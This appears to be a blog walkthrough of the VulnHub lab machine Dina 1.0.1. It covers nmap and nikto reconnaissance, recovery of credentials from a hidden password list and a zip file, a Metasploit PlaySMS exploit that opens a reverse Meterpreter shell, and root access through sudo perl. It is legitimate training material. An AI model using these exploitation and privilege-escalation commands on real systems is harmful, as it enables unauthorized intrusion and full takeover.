Saturday, November 16, 2019

VulnHub: Dina 1.0.1 Walkthrough

We first start off with an nmap scan against the remote host. 
root@ubuntu:~/Downloads# nmap -sC -sV -O -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-14 19:44 MST
Nmap scan report for vtcsec (192.168.56.101)
Host is up (0.00043s latency).
Not shown: 993 closed ports
PORT      STATE    SERVICE      VERSION
80/tcp    open     http         Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
MAC Address: 08:00:27:3A:EC:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
root@ubuntu:~/Downloads#
NMAP came back with only port 80 open and the sites robots.txt file giving us some directories to browse. 
User-agent: *
Disallow: /ange1
Disallow: /angel1
Disallow: /nothing
Disallow: /tmp
Disallow: /uploads
Most of the directorys are empty but the 'nothing' contains a 404 error message. If we view source of the webpage we find a hint. view-source:http://192.168.56.101/nothing/ 
#my secret pass
freedom
password
helloworld!
diana
iloveroot
We have a list of passwords we can use later. Our next task was to run nikto against the host to see if it finds any thing of intrest. 
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-11-14 19:49:10 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 07:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8761 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2019-11-14 19:49:26 (GMT-7) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#
Nikto came back with an intreseting directory 'secure' if we browse to the directory we find a zip file backup.zip http://192.168.56.101/secure/
If we download the archive file and try to open it we see that it is password protected. If you remember we got a list of passwords, lets try those passwords against the zip file. We found that the password for the zip archive is 'freedom' from the list we found eariler. We now extract the mp3 file and do a little foresnics. 
root@ubuntu:~/Downloads# file backup-cred.mp3 
backup-cred.mp3: ASCII text
root@ubuntu:~/Downloads# 
root@ubuntu:~/Downloads# strings backup-cred.mp3 
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin
root@ubuntu:~/Downloads#
The mp3 file is not a mp3 file at all but a text file. We run strings on the file and get back a message giving us a username and a url to visit. http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login
We have a login screen here where we will try the username touhid and the passwords from the list earlier. 
username: touhid
#my secret pass
freedom
password
helloworld!
diana
iloveroot
http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_welcome
After we found a succesful login for touhid with the password diana. We next go on to searching for exploits for the PlaySMS software. 
root@ubuntu:~/src/exploitdb# ./searchsploit playsms
------------------------------------------------------------------------------------------------------------- -------------------------------------------
 Exploit Title                                                                                               |  Path
                                                                                                             | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)                           | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload                           | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                                             | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)                       | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                                          | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection                                                                                  | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                                               | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                                        | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                                                                      | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery                                                                 | exploits/php/webapps/30177.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb#
We have a few choices, but I see there is a metasploit version which is the one we will use to get code executes and then a shell. Lets fire up metasploit and try it out. 
msf5 > search playsms

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/playsms_filename_exec   2017-05-21       excellent  Yes    PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
   1  exploit/multi/http/playsms_uploadcsv_exec  2017-05-21       excellent  Yes    PlaySMS import.php Authenticated CSV File Upload Code Execution


msf5 > use exploit/multi/http/playsms_filename_exec
msf5 exploit(multi/http/playsms_filename_exec) > show info

       Name: PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
     Module: exploit/multi/http/playsms_filename_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-05-21

Provided by:
  Touhid M.Shaikh 
  DarkS3curity

Available targets:
  Id  Name
  --  ----
  0   PlaySMS 1.4

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD   admin            yes       Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base playsms directory path
  USERNAME   admin            yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a code injection vulnerability within an 
  authenticated file upload feature in PlaySMS v1.4. This issue is 
  caused by improper file name handling in sendfromfile.php file. 
  Authenticated Users can upload a file and rename the file with a 
  malicious payload. This module was tested against PlaySMS 1.4 on 
  VulnHub's Dina 1.0 machine and Windows 7.

References:
  https://www.exploit-db.com/exploits/42003
  https://cvedetails.com/cve/CVE-2017-9080/
  https://www.youtube.com/watch?v=MuYoImvfpew
  http://touhidshaikh.com/blog/?p=336

msf5 exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
USERNAME => touhid
msf5 exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
PASSWORD => diana
msf5 exploit(multi/http/playsms_filename_exec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/playsms_filename_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin
TARGETURI => /SecreTSMSgatwayLogin
msf5 exploit(multi/http/playsms_filename_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Authentication successful : [ touhid : diana ]
[*] Sending stage (38288 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:40206) at 2019-11-16 13:19:18 -0700

meterpreter > shell
Process 3741 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
We got a shell after running the metasploit exploit module. Lets now try and enumerate the system to find a way to elevate our privleges. 
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudoedit
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/arping
/usr/bin/X
/usr/bin/chfn
/usr/sbin/pppd
/usr/sbin/uuidd
/bin/ping6
/bin/umount
/bin/mount
/bin/ping
/bin/su
/bin/fusermount
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
The find command for SUID able binaries didnt come back with anything interesting soo lets try sudo -l. 
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l 
sudo -l
Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
The user www-data can run sudo with no password using the perl binary. We issue a simple perl commandline and break out in to a root shell 
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo perl -e 'exec("/bin/sh -i");'
sudo perl -e 'exec("/bin/sh -i");'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
#
Now that we have root and there is to do is cat the flag.txt. 
# cd /root
cd /root
# ls -la
ls -la
total 52
drwx------  6 root root 4096 Oct 17  2017 .
drwxr-xr-x 23 root root 4096 Oct 17  2017 ..
-rw-------  1 root root 2466 Oct 17  2017 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwxr-xr-x  3 root root 4096 Oct 17  2017 .cache
drwxr-xr-x  3 root root 4096 Oct 17  2017 .config
drwxr-xr-x  3 root root 4096 Oct 17  2017 .local
-rw-------  1 root root   55 Oct 17  2017 .mysql_history
-rw-------  1 root root    9 Oct 17  2017 .nano_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4096 Nov 15 08:13 .pulse
-rw-------  1 root root  256 Oct 17  2017 .pulse-cookie
-rw-r--r--  1 root root  639 Oct 17  2017 flag.txt
# cat flag.txt
cat flag.txt
________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //////-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))


root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....


CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6



#
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Enumerating UNIX usernames
    Sometimes you may come across a situation where all you have from your OSINT phase is a list of first and last names. you can use pre-built...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • Attacking SMTP on Debian Linux
    First lets do a quick service scan against the remote host. root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com Starting Nmap 7.01 ( https:...
  • Attacking NFS
    This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com k.madden@m...
  • VulnHub: RickdiculouslyEasy Walkthrough
    Lets first start off with a nmap scan of the remote host. root@ubuntu:~# nmap -p0-65355 -sV -O -sC -T5 192.168.0.48 Starting Nmap 7.60 (...
  • Exploring IMAP Servers
    Scanning the Remote Host We can use NMAP to scan the remote IMAP server and run enumeration scripts agaisnt it to see what all the server i...